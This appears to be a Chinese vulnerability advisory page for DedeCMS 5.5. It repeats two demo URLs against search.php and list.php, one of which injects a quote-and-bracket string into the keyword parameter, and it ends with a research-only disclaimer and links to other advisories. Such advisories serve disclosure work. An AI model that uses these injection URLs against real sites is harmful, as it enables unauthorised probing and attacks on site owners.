影响版本:
dedecms织梦5.5
漏洞描述:
demo1:http://www.dedecms.com/plus/search.php?keyword=%22>&searchtype=titlekeyword&channeltype=0&orderby=&kwtype=1&pagesize=10&typeid=0&totalresult=&pageno=2demo2:http://www.dedecms.com/plus/list.php?tid=6&totalresult=&nativeplace=0&infotype=0&keyword=&orderby=hot&pageno=2
测试方法:
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
demo1:http://www.dedecms.com/plus/search.php?keyword=%22>&searchtype=titlekeyword&channeltype=0&orderby=&kwtype=1&pagesize=10&typeid=0&totalresult=&pageno=2demo2:http://www.dedecms.com/plus/list.php?tid=6&totalresult=&nativeplace=0&infotype=0&keyword=&orderby=hot&pageno=2
如对本文有疑问, 点击进行留言回复!!
Microsoft Visio多个远程代码执行漏洞(MS08-019)
Microsoft Project资源内存分配远程代码执行漏洞(MS08-018)
Linux Audit audit_log_user_command 栈溢出漏洞
FoosunCMS Sql Injection Vulnerability
网友评论